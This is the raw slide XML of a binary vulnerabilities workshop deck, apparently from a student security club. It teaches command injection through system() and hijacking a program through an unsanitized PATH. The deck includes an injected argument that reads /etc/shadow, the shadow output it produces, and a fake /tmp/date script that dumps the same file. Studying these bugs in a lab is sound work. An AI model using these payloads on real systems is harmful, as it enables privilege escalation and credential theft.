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6" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="277" r:id="rId8"/>
    <p:sldId id="278" r:id="rId9"/>
    <p:sldId id="268" r:id="rId10"/>
    <p:sldId id="262" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="263" r:id="rId13"/>
    <p:sldId id="265" r:id="rId14"/>
    <p:sldId id="266" r:id="rId15"/>
    <p:sldId id="269" r:id="rId16"/>
    <p:sldId id="270" r:id="rId17"/>
    <p:sldId id="271" r:id="rId18"/>
    <p:sldId id="280" r:id="rId19"/>
    <p:sldId id="272" r:id="rId20"/>
    <p:sldId id="281" r:id="rId21"/>
    <p:sldId id="282" r:id="rId22"/>
    <p:sldId id="274" r:id="rId23"/>
    <p:sldId id="279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943EED-8ACC-4990-80B2-8F3153C16532}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="257"/>
            <p14:sldId id="258"/>
            <p14:sldId id="259"/>
            <p14:sldId id="276"/>
            <p14:sldId id="260"/>
            <p14:sldId id="277"/>
            <p14:sldId id="278"/>
            <p14:sldId id="268"/>
            <p14:sldId id="262"/>
            <p14:sldId id="264"/>
            <p14:sldId id="263"/>
            <p14:sldId id="265"/>
            <p14:sldId id="266"/>
            <p14:sldId id="269"/>
            <p14:sldId id="270"/>
            <p14:sldId id="271"/>
            <p14:sldId id="280"/>
            <p14:sldId id="272"/>
            <p14:sldId id="281"/>
            <p14:sldId id="282"/>
            <p14:sldId id="274"/>
            <p14:sldId id="279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42" autoAdjust="0"/>
    <p:restoredTop sz="88449" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="86" d="100"/>
          <a:sy n="86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32BD5-D9F3-41DA-B557-6AF7054C3B9B}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>13/05/2019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776A5-170C-410A-8A72-FEEAF706F5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917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1A6-BC3E-43F3-B898-5CD3A418D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5A8C6-DBDF-44EB-A403-AA0F3AA30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F513-E5F2-4D0F-A706-BB19C25A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13/05/2019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6964F-B550-4842-971F-5ACD382E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EC08B-EB25-49D6-B7E1-B7B8E39C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003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DE02-3F52-4C80-80BA-7B5DB9E9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B3435-5940-4925-B593-855E60C03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6C4DA-9DD8-4DA9-8A01-8AEC67A9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13/05/2019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D277-40F9-4A21-A5E0-72EDDB11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6998-7736-4EB0-9EDE-0B1F8DE5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76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60092-C59B-4DFD-BD83-FE9C6531B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C3A55-B5F2-480B-986A-AAB898D09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70AF1-905C-45BC-B9B4-FE3F21D4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13/05/2019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6C17-89FE-4DB6-907B-51A98EEF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F40D0-3ECF-4330-91DB-83319A3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954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4D13-D24C-4D8C-BDC1-BDD4DC3D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BA43-B990-4DD7-AEF0-DFAC949A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B686-9AC3-4845-B9B4-1AA7D61B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13/05/2019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23A0-6D03-40B5-8E5E-99BD0E50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66-5CB7-4813-95ED-191CD89A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506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CCB1-4DE4-4EDC-845A-F3C6010A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8EA14-4590-49EB-97FC-03D81147C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C2422-1D4E-4381-AE85-EE531CA3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13/05/2019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C73A-47F5-48FC-9588-F2D8F74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77CA0-DAA8-47EB-AD2D-88754804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523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918-967F-4BFC-B563-B15728EA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9092B-4377-46E3-860B-DC608FFF0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1837A-711E-4FE3-9FB3-BAC426C15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20ECA-86CF-4C37-B9B5-E1C38381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13/05/2019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F668F-FB95-41E1-A476-3D4E90D4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09AC6-4AA9-4FDF-81CA-D3F32711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25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81F0-142C-4ED1-8792-D114B57A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95FDA-29BC-4C06-BD1D-C0BC0CF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1CB6C-0EAA-4372-9DE2-95F2D9957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10F38-51D4-496E-8734-25094D6E4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AEA4E-4BCB-4742-BB85-667E2ACBF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5E7D5-3D9C-4007-8B56-DB1ADDD0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13/05/2019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AE1F5-B20C-4DE3-81C4-FAB1F82F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D022F-8429-4232-B616-E65BBFB4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762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548E-8A66-4546-9D07-2788BA11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3B8A9-5368-443D-9E7D-02EAA78D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13/05/2019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3D2BE-FB87-466C-95E6-EC18A1A3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0D155-E017-4F34-A42D-8F35FB4C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650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CF7A7-FE22-49B9-B412-01D3B82F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13/05/2019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386E6-A1BE-43D6-BCFE-5C76501D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7A22B-CEB7-4F67-9EF0-C231F0B9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933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989E-286D-4F9D-8462-2231B0CD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2106-75C3-46B0-A6F5-C5E6F269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D0B9B-24F3-4879-9049-BDCF7974D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99D4B-D5AF-4268-B281-C16B5F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13/05/2019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796BC-688B-4581-8C84-9B7D5B1C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BF13-9BB6-4D9D-8341-2D9DCFC0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887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8839-9FFE-45B3-8BBA-4F4F089A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D7185-EA95-477D-8DC3-9EB74A19C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71C61-9190-4FE6-B311-15DDE4F3D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EF5E8-4882-462B-91AC-62B1E14E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13/05/2019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7C00D-EB03-4C7C-8246-C99244F8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6D56-28CD-4CF9-BA72-828313C3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714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1B3E5-952D-46CA-B464-9CD363EC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F9485-9704-4046-AE17-69DC576E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2E163-D77F-44FA-87D9-144F6FE69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C039-0959-4415-8AA5-45886C5F6194}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>13/05/2019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7437E-B81B-4132-B802-A9A8AB1BB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6F780-ED87-4E36-81E6-22BFFF873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086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18D3A4-00B1-48C5-8AFF-A7966A29E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8" y="2095500"/>
            <a:ext cx="2667000" cy="2667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781885" y="3340220"/>
            <a:ext cx="7830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Level Binary Vulnerabilities Workshop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781885" y="2095408"/>
            <a:ext cx="78308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MISC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281899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Command Injection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42527-6BBF-4BF7-873B-E1629AC8BDD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="2006352"/>
            <a:ext cx="11420475" cy="41014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2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include 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AU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#include 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AU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stdlib.h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main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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argc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**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argv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A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cmd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[512];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argc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!= 2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF66CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return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snprintf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cmd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, 512, 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"/bin/echo '%s'"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argv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[1]) &gt;= 512) {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("Input too long!\n"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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF66CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return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system(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cmd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AU" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF66CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return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DB677-EFC3-4C9C-A313-97793931E6AB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 the bug!</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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23DF07-E202-494D-9A41-48B2B2138CE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3281779" y="5264876"/>
            <a:ext cx="1545060" cy="0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2DF6D6-C7B8-4A80-88B9-6F8C1176140A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4587142" y="2042530"/>
            <a:ext cx="562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Constructs "/bin/echo '{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0" err="1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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="28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[1]}'"</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7C8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84874-B002-4945-B8D3-CBB175973651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4826839" y="4993520"/>
            <a:ext cx="562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Runs it as a shell command</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7C8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9C56E8-6439-46FE-9C84-5FFD7CC201B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6711518" y="2565750"/>
            <a:ext cx="275209" cy="119492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3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Command Injection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721EEF-6B3F-41C6-BBDB-4D59EE10A688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="944177" y="1430558"/>
            <a:ext cx="107388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snprintf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cmd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, 512, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="32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"/bin/echo '%s'"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argv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[1])</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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CDDFF-5FA3-485E-B7E8-AAC2763FFA35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="2565749"/>
            <a:ext cx="11525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Input:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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MISC rocks!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU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Output: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="40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/bin/echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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'MISC rocks!'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13048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Command Injection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721EEF-6B3F-41C6-BBDB-4D59EE10A688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="944177" y="1430558"/>
            <a:ext cx="107388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snprintf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cmd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, 512, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="32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"/bin/echo '%s'"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argv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[1])</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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CDDFF-5FA3-485E-B7E8-AAC2763FFA35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="2565749"/>
            <a:ext cx="115252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Input:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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MISC rocks!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU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Output: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="40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/bin/echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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'MISC rocks!'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU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Input:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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a'; cat '/etc/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU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Output: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="40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bin/echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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'a'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="40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; cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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'/etc/shadow'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28902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Command Injection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721EEF-6B3F-41C6-BBDB-4D59EE10A688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="944177" y="1430558"/>
            <a:ext cx="107388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snprintf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cmd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, 512, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="32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"/bin/echo '%s'"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argv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[1])</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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CDDFF-5FA3-485E-B7E8-AAC2763FFA35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="2565749"/>
            <a:ext cx="115252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Input:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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MISC rocks!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU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Output: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="40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/bin/echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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'MISC rocks!'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU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Input:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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a'; cat '/etc/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU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Output: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="40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bin/echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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'a'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="40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; cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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'/etc/shadow'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5C03EA29-E7A4-4F52-9866-DF74F1A3803B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="8664517" y="3365604"/>
            <a:ext cx="97650" cy="4642837"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 213891"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst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6A6785-AB78-4D2B-918A-E7953C41C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33" y="5938162"/>
            <a:ext cx="769879" cy="7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1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Command Injection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42527-6BBF-4BF7-873B-E1629AC8BDD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="1332903"/>
            <a:ext cx="11420475" cy="45352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2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bash$ ./buggy "MISC Rocks!"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MISC Rocks!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bash$ ./buggy "a'; cat '/etc/shadow"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7C8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2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7C80"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root:*:17431:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7C80"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>daemon:*:17431:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7C80"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bin:*:17431:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7C80"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sys:*:17431:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7C80"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sync:*:17431:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7C80"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>games:*:17431:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7C80"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>man:*:17431:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7C80"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7C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Unsanitized</a:t>
            </a:r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PATH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42527-6BBF-4BF7-873B-E1629AC8BDD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="2006353"/>
            <a:ext cx="11420475" cy="20152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2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include 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AU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stdlib.h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main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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system(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"date"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AU" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF66CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return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DB677-EFC3-4C9C-A313-97793931E6AB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can something with no user input be exploitable?</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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07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Unsanitized</a:t>
            </a:r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PATH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42527-6BBF-4BF7-873B-E1629AC8BDD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="2006352"/>
            <a:ext cx="11420475" cy="4110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bash$ echo $PATH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/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin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bash$ ls –la /bin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-rwxr-xr-x 1 root root 1037528 May 16  2017 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bash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-rwxr-xr-x 1 root root  520992 Jun 16  2017 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btrfs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-rwxr-xr-x 1 root root  249464 Jun 16  2017 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btrfs-calc-size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lrwxrwxrwx 1 root root       5 Jun 16  2017 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btrfsck -&gt; btrfs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-rwxr-xr-x 1 root root  278376 Jun 16  2017 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btrfs-convert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nl-NL" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-rwxr-xr-x 1 root root   68464 Mar  3  2017 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL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-rwxr-xr-x 1 root root    1910 Oct 27  2014 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zmore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-rwxr-xr-x 1 root root    5047 Oct 27  2014 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znew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DB677-EFC3-4C9C-A313-97793931E6AB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does bash 'know' where to look for our command?</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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68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Unsanitized</a:t>
            </a:r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PATH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42527-6BBF-4BF7-873B-E1629AC8BDD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="2006352"/>
            <a:ext cx="11420475" cy="4110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bash$ echo $PATH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/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin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bash$ ls –la /bin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-rwxr-xr-x 1 root root 1037528 May 16  2017 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bash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-rwxr-xr-x 1 root root  520992 Jun 16  2017 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btrfs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-rwxr-xr-x 1 root root  249464 Jun 16  2017 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btrfs-calc-size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lrwxrwxrwx 1 root root       5 Jun 16  2017 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btrfsck -&gt; btrfs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-rwxr-xr-x 1 root root  278376 Jun 16  2017 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btrfs-convert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nl-NL" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-rwxr-xr-x 1 root root   68464 Mar  3  2017 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL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-rwxr-xr-x 1 root root    1910 Oct 27  2014 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zmore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-rwxr-xr-x 1 root root    5047 Oct 27  2014 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znew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DB677-EFC3-4C9C-A313-97793931E6AB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does bash 'know' where to look for our command?</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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BA9453-6951-4CB1-A1B0-3030D329BE2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7321119" y="4963035"/>
            <a:ext cx="775316" cy="0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4F562D-6559-4C8F-AD97-68D39EBCC90A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8149701" y="4416473"/>
            <a:ext cx="3462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Finds it in /bin, which is part of our</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="28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PATH variable</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7C8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2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Unsanitized</a:t>
            </a:r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PATH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42527-6BBF-4BF7-873B-E1629AC8BDD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="2006352"/>
            <a:ext cx="11420475" cy="13494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bash$ ./vuln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Mon May 13 19:01:31 STD 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DB677-EFC3-4C9C-A313-97793931E6AB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can eliminate PATH completely:</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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64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Unsanitized</a:t>
            </a:r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PATH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42527-6BBF-4BF7-873B-E1629AC8BDD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="2006352"/>
            <a:ext cx="11420475" cy="13494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bash$ ./vuln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Mon May 13 19:01:31 STD 2019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bash$ PATH='' ./vuln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 1: date: not found</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE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DB677-EFC3-4C9C-A313-97793931E6AB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can eliminate PATH completely:</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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7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the .ova (~700MB) file for today’s workshop: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 1 -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it at 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https://tinyurl.com/yyrnkww2</a:t>
            </a:r>
            <a:b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AU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(Some people have reported the download has issues on Chrome – try Firefox)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU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 2 -</a:t>
            </a:r>
          </a:p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it via USB being passed around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will also need some virtualization software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(VirtualBox, VMware Fusion OK – others should also be OK but not tested)</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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While you wait…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="310757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Unsanitized</a:t>
            </a:r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PATH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42527-6BBF-4BF7-873B-E1629AC8BDD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="2006352"/>
            <a:ext cx="11420475" cy="13494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bash$ ./vuln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Mon May 13 19:01:31 STD 2019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bash$ PATH='' ./vuln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 1: date: not found</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE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DB677-EFC3-4C9C-A313-97793931E6AB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can eliminate PATH completely:</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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FD92D-07F2-4F0F-B079-5DD34719A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92" y="3644284"/>
            <a:ext cx="769879" cy="769879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80EAB020-2F5B-402A-B485-17293B16D232}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="1883951" y="1765109"/>
            <a:ext cx="118960" cy="3208819"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 213891"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst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734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Unsanitized</a:t>
            </a:r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PATH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42527-6BBF-4BF7-873B-E1629AC8BDD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="2006352"/>
            <a:ext cx="11420475" cy="13494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bash$ ./vuln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Mon May 13 19:01:31 STD 2019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bash$ PATH='' ./vuln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 1: date: not found</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE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DB677-EFC3-4C9C-A313-97793931E6AB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can eliminate PATH completely:</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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FD92D-07F2-4F0F-B079-5DD34719A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92" y="3644284"/>
            <a:ext cx="769879" cy="769879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80EAB020-2F5B-402A-B485-17293B16D232}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="1883951" y="1765109"/>
            <a:ext cx="118960" cy="3208819"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 213891"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst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B1CDB-4E66-4090-8EFF-1FBAB1A97294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="4440297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happens if we make our own date command?</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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15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Unsanitized</a:t>
            </a:r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PATH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42527-6BBF-4BF7-873B-E1629AC8BDD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="1332904"/>
            <a:ext cx="11420475" cy="4135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bash$ cat /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tmp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/date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU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#!/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="20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AU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/bin/cat /etc/shadow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bash$ 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chmod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777 /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tmp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/date</a:t>
            </a:r>
          </a:p>
